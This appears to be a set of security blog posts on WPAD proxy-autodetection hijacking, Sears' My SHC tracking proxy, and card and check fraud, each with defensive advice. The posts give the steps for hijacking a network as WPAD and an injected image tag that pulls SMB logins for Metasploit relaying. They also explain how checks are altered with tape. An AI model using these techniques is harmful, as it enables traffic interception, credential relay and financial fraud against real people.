return “PROXY isa.squid.com:80; DIRECT”;
}

This tells IE to use the same proxy for everything, and that if that fails, try a direct connection. An enterprise with multiple proxies and internal networks could use the URL and HOST parameters to do a more complex proxy configuration. This file is actually in the Netscape Proxy Client Autoconfig file format, and can contain quite a bit of interesting script.

So, in a large enterprise, this is all very convenient. As the network administrator, you can control the proxy configuration of everyone on the network from one convenient file. Should you need to change anything, you change it in one place and it gets picked up. Most enterprises don’t use this feature — I’ve heard that only about 3% do — because they instead distribute proxy settings via domain Group Policy, or they simply don’t use a proxy at all. However, the few enterprises that do are some of Microsoft’s largest customers, so this feature probably has some very influential people backing it.

So, what’s the problem with this? Why do I think of it as IE’s worst feature? Because in those 90%+ of enterprises and effectively-100% of non-enterprise networks that don’t use WPAD, you can use it to mount man-in-the-middle attacks and hijack everyone’s web traffic. If someone is using you as a proxy, you have total control over their web activity. You can read everything they do, everything that the server responds with, etc. You can redirect any web traffic transparently to your own fake sites. You can even modify the responses from real sites on-the-fly with scripts — there are proxy servers for Linux that will run everything that goes through it through some user-specified regular expressions to edit them. The classic demonstration of this was a user who set up his proxy to replace all image loads on all web pages with upside-down versions of the images or random cute cat pictures from www.kittenwar.com; you can see his proxy configuration at ex-parrot.com. You can even intercept SSL communications this way, though the user will get an error message that the URL on the certificate doesn’t match the site certificate (or, if you’re more careful about crafting the cert, simply that the certificate isn’t signed by a trusted authority.)

WPAD can enable you to take control of others’ proxy settings. How? Simple… just name your computer WPAD and join a network. Anyone who uses Internet Explorer will ask your computer for the GetProxyForUrl function. All you have to do is run a web server containing a file called wpad.dat at the root, and configure the server to return that file with a MIME type of “application/x-ns-proxy-autoconfig”. That file can contain a line making your computer the proxy for all URLs, and now you get everyone’s web traffic.

Normally, just registering with DHCP with a computer name of “WPAD” is enough to get you into DNS and hijack the entire network. Failing that, even if DNS is restricted, if WPAD doesn’t exist other systems will still find you based on WINS (which is decentralized and unauthenticated, and thus cannot be restricted.) And even if WPAD does exist, this feature is still scary — an attacker can still get their system named WPAD via a host of mechanisms, like DNS cache poisoning, ARP spoofing, rogue access points, etc.

But wait, it gets worse! By carrying out this attack, the attacker has the ability to make you execute arbitrary web-safe code (i.e. anything your browser will do without prompting.) After all, they can edit any page you view and add script to it. What if they add script like this?

<img src=”\\wpad\share\image.gif”>

Note that that’s a UNC path (Windows file sharing), not an HTTP path. Your computer will try to download that image via SMB — and since the attacker is on your local network, SMB will be successfully routed to him. Now, if he’s got a public share called “share” hosting an image called “image.gif”, this is no big deal — IE will simply display the image. But what if his machine doesn’t have shares at all, but instead a Metasploit console running my favorite Metasploit module, SMBRELAY2? Then each time a user accesses any web page, the attacker gains access to one resource of his choice as the user who loaded the web page. Every time you browse the web, the attacker gets to take an action with your credentials — including connecting back to your computer with your privileges (probably Administrator, if you’re like most people) or to any other share or website you have access to with your Windows credentials. The attacker doesn’t actually get your password — he just probably doesn’t need it, since he can act as you anyway.

Actually, an attacker can do everything I described above using only a standard Linux box with a Metasploit installation (or a BackTrack 3 LiveCD.)

So, what can you do to protect yourself or your network from this attack? As an end-user, it’s pretty simple — go into your IE or Firefox or other browser settings and disable proxy autodetection. You probably don’t need it anyway, and it slows down your first page load. If you use a network that does require a proxy, find out what the proxy is and enter its settings manually. The only reason you wouldn’t be able to do this is if you are joined to a domain that sets this setting to On via domain Group Policy, or if you run the ISA Firewall Client with the option “Enable Web Browser Automatic Configuration” enabled (in which case you can just disable that setting, too.)

As a network administrator, it’s a bit harder. If your network does not use WPAD, you could force autodetection off with Group Policy. If you do use it, make sure you have a machine registered as WPAD at each domain level and in both DNS and WINS, and specify the machine (preferably by IP address) in DHCP option 252. If a system gets the WPAD address out of DHCP, it will make no attempt to find it in other ways, which greatly reduces the opportunity for spoofing.

The ultimate solution to this would be for Microsoft to make it off by default. Unfortunately, as an automation-simplification feature, having it off by default would pretty much defeat its purpose.

CA’s Security Advisor Research Blog has an interesting post about a bit of malware they discovered when doing research for their Anti-Spyware product — the My SHC Community system. You’re offered a chance to join when you buy something from sears.com or kmart.com. The system offers you “special offers and promotions,” the usual marketing stuff — give up some privacy in exchange for discounts.

However, this system does rather more tracking than your average grocery store “membership card.” When you join, it installs a local proxy on your system and reroutes all your web traffic through it, including SSL sessions on port 443 (yes, it actually mounts local man-in-the-middle attacks on your online banking.) It then monitors this traffic, and based on some algorithm that has not been disclosed, sends some of it to comScore. Sears’s privacy policy promises not to share your data with anyone, and so does comScore’s, but it’s pretty hard to figure out what that means in this case. After all, comScore’s policy also promises not to collect any information that’s personally identifiable, but your My SHC Community data is tied to a personal ID at Sears, so in this case they’re clearly collecting personally identifiable information. Also, I think most people would consider copies of my online transactions in SSL sessions to be “personally identifiable;” while we can’t be sure comScore gets all of these (since the algorithm by which some traffic is rerouted is unknown), we do know the software is capable of sending them to comScore so we just have to take their word for it. Also, CA’s research did show an SSL transaction being rerouted, credit card numbers and all.

Bruce Schneier points out that if an average piece of spyware did this, it would be considered criminal. However, not only is Sears a large corporation and thus able to get away with this sort of thing (remember the Sony Rootkit debacle?), it also did have a pretty clear privacy statement that the user agrees to before installing it, so it may be on good legal ground. However, even if it’s legal, it’s a terrible idea for all involved.

First of all, the app is silent — once it’s been installed, it gives no indication it is monitoring your traffic, and no clear way to remove it. Second, the fact that the app comes from Sears, providing their privacy policy, but the data goes to comScore, while both parties claim the data is not shared with “any other party,” makes the privacy policies border on nonsensical. If it takes a lawyer to figure out what exactly your click-through license agreement means, it’s pretty disingenuous to claim that end users have been properly informed and have voluntarily waived their privacy rights. And third, comScore & Sears are collecting data (such as your credit card numbers and favorite non-commercial websites) that they don’t even want along with the information that they’re trying to collect. This puts on them a legal burden to protect and secure huge volumes of information that provides them no benefit.

When you have private data that you have a moral, legal, or regulatory responsibility to protect, the first thing to consider, before looking at security measures, is whether you need the data at all. It’s a lot easier to delete it and stop collecting it than it is to put in encryption systems, network access controls, auditing and logging systems, etc. A lot of companies collect reams of useless private data simply because “they’ve always done it that way,” and thus have to spend money protecting things of no value to them. This is probably the logic behind Sears’s data collection here — “we might as well have everything, it could be useful someday” without thinking about the cost that having that data imposes on the enterprise. You can’t have a catastrophic data breach if you don’t have the data.

This is also another symptom of a larger problem — people are increasingly unable to control the code running on their own computers. The separation of code and data is becoming increasingly porous with the web’s “active content,” and DRM software exists to keep the user from controlling their own system’s activity. Microsoft’s Vista User Account Control and Integrity Levels systems try to mitigate this, but it’s really not enough.

The problem is that they rely on the user to determine what code is allowed to run, but the user is unable to verify what that code will do until he runs it. It’s impossible for the computer to tell the user what it will do, as native code is unverifiable. With some technologies, such as Microsoft .NET code, it is possible for the system to tell the user what the code will do, but people writing malicious or underhanded apps like this Sears spyware and the Sony rootkit will not use these technologies, sticking to the unverifiable native code. It is my hope that virtualization will offer a way out of this in the long term — a way for each application to have its own enforceable security boundary. However, to avoid these same problems from occurring, application developers will have to give up functionality — that is, certain types of inter-application interaction will have to be categorically prohibited, which will sometimes inconvenience the user.

I think we’re more likely to see these solutions come from the open-source world than the commercial operating system world (i.e. Microsoft and Apple.) The commercial OS world is very concerned about a.) ease of use for the user, and b.) backwards compatibility for applications, as these things sell software. The open-source world is less concerned with these things, which inhibits their adoption in the marketplace but also results in software that is often much more under the user’s control than commercial software is. The real trick will not be developing these security technologies (not that that will be easy); it will be adapting them so that they can be used every day by non-technical users.

During this year’s Christmas shopping season, I made some large in-person transactions at the same time as my wife made an online transaction, and my credit card was suspended by the issuing bank for potential fraudulent activity.  This happens relatively often, whenever someone’s spending patterns are flagged by the neural-network based automated fraud detection used by all the major credit card issuers.  When calling the bank to have the card reactivated, I was told by the customer service representative, “since online transactions are, you know, more dangerous, we tend to notice those.”

This is not an uncommon perception.  Many people who think nothing of handing over their credit card or writing a check when at a store or restaurant hesitate to use the same card online, regardless of communication protections (e.g. SSL/HTTPS), third-party assurances like the preposterously-named HackerSafe, or the size and stability of the vendor.  After all, it’s the Internet, there are bad people out there.

However, the perception just isn’t true.  There are two ways in which the Internet particularly helps thieves, though:

1. Once they’ve stolen an identity or credit card number, thieves often use the card online, as they don’t have to present themselves (and thus show up to witnesses and potentially security cameras) to use the card.  This is actually probably what the credit card company in my experience meant — not that the transactions are more dangerous, but that fraudsters often use stolen cards online.
2. Hackers stealing credit card information online often steal entire databases.  They don’t steal your credit card while you’re buying something online — they break into the online store and steal everybody’s card.

However, they could just as easily have broken into the servers of a brick-and-mortar store — it’s not the fact that you used the card online that makes it possible for them to steal it, it would have been just as at risk handing it to a cashier.

In many ways, it’s a lot more risky to make non-cash payments in person!  When you hand your credit card to a waiter or clerk or cashier, they could easily copy the number, expiration date, and CCv2 code (the three-digit code on the back than an online site often won’t even get.)  With a debit card, they have the opportunity to watch PINs being typed.  Whereas in an online store, only relatively few, well-paid professionals will have access to your data (system administrators, etc.), every $7 per hour sales clerk can see a hundred card numbers per day, and probably has significantly more financial motivation to steal them (although in my experience, the fact that someone doesn’t need money won’t stop them from stealing it if they’re the type to steal — just look at Michael Milken, who defrauded people out of hundreds of millions of dollars at the same time he was making hundreds of millions legitimately.)

Some people — usually those of us who remember the days before debit cards — eschew all these fancy online and electronic forms of payment and instead stick to good old fashioned checks.  After all, no one can possibly steal those!  They’re paper, and have your signature on them.  This is the ultimate in perception differing from reality — it’s hard to imagine a less secure way to make a payment than a paper check.

First of all, there’s the ease of committing fraud with checks.  A thief with a stolen check (or deposit slip) has all they need to take money from your account — the routing number and account number (found at the bottom of the check in MICR letters.)  Note that the thief doesn’t need any kind of ID… or a PIN… or a physical card… or a CCv2 code… or even to know your name.  No, the numbers will do.  What can they do with a stolen check?  There are three basic things:

• Order up a whole book of checks with your information and account numbers on them.  No ID is required to order checkbooks online.  They can then spend these checks anywhere, and the bank will process them — you probably won’t find out until your account is empty and you start getting NSF notices.
• Remove the amount and recipient from the check and write it out to themselves instead.  This is a bigger problem for institutional checks, which are often printed on a laser printer.  It’s really easy to remove laser-printed text from an offset-printed check — just lay some Scotch tape over the laser text, rub it hard with your fingernail, and peel the text off.  Then you can print out a new amount and recipient with your own laser printer, and it looks just like the real thing.  Chemical agents (”check washing”) can do this with ball-point pen ink, too, though it’s not so easy.
• Issue a demand draft (”paperless check.”)  This is what happens when you pay by phone with your checking account number, or use an automated bill pay service, or send money via PayPal.  Using your routing number and account number, money is simply removed from your account and put into someone else’s.  No authorization or authentication is used, your name is not even required.  Yes, really.  Anyone can do this from any account to any other account.  For a while, you used to be able to do this from a web site.

Second, there’s the difficulty in getting your money back or even stopping the fraud!  With a credit card (and to a lesser extent, a debit card), it’s pretty simple — you call the bank, say you did not authorize a charge, and the credit card company removes the charge.  It is then up to them to prove you did make the charge, such as by getting a signed receipt from the merchant and matching your signature.  So long as you report the fraud within 30 days, you are not liable — the worst the card company can do to you is to cancel your card (but you still don’t have to pay for the charge you didn’t make.)  In theory, you’re liable for up to $50, but almost no card issuers really charge this since it’s terrible customer service (”Sorry you were stolen from!  Give us $50!”)

With checks, the money is already gone.  If you report a check as fraudulent, there is no federal law saying the bank is liable — it’s up to the bank’s own policies and in some cases a hodgepodge of state laws whether they have to help you at all.  The bank may get back to you in 60 to 90 days (during which you don’t have the money, even if it was the entire contents of your checking account.)  You have to report the fraud on a paper letter, with a notarized signature, usually by certified mail.  What’s more, you have to prove that the checks were not authorized — the burden of proof is on you, not the bank or merchant — and you have to do it to each party from which you’re trying to reclaim money.  If a thief wrote bad checks in 20 different jurisdictions, you may be dealing with this for years.

Worse yet, you can’t stop the fraud from taking place.  The thief can keep writing checks on your account even after you’ve started reporting them as fraud, and even after you’ve closed the account.  Every time the thief writes a bad check on a closed account (the classic practice known as “paperhanging”, a favorite of Frank Abagnale during his criminal youth), your bank will reopen the account and send you an NSF notice.  You have to dispute all of these, too.  And finally, your account (and possibly your name) will go into ChexSystems (the equivalent of the credit bureaus used to check people’s checking account history) as fraudulent, which will make it difficult or impossible to get new checking accounts for many years.  On the bright side, it will make it harder for the thief to open accounts in your name, but that’s little consolation since he can keep using the closed one he already has.

From a security perspective, checking accounts are horrid.  They come from a day when authentication and authorization were unheard-of, and security came mainly from the idea that no one would figure out how to subvert the system.

What can you do to protect yourself?

• Don’t use checks.  If any method of payment is offered aside from checks, use that.
• Don’t use demand drafts, either — they’re checks.  Don’t pay by phone using a checking account number — use a credit/debit card.
• If you must write paper checks, use them only to pay bills, dealing with relatively trusted merchants.  It doesn’t make you totally safe, of course, but it helps some.  Use gel ink to write checks (it’s harder to wash), or a dot-matrix printer to print them (the impact-printed ink is nigh-impossible to remove.)  According to Abagnale’s The Art of the Steal, this makes check-washing nearly impossible (though ordering up new checks in your name still works.)  Incidentally, The Art of the Steal is a fantastic (and very short) book, and I highly recommend it to anyone interested in security — it gives a great view into the security mindset, looking at all parts of a system and seeing how it can be subverted.
• Don’t store any more money in your checking account than you have to.  You’ll still have to fight every fraudulent transaction to stop the bank trying to collect it from you, but at least you’ll still have your money while you’re doing it.

The sooner we move on from this antiquated and unsafe payment system, the better.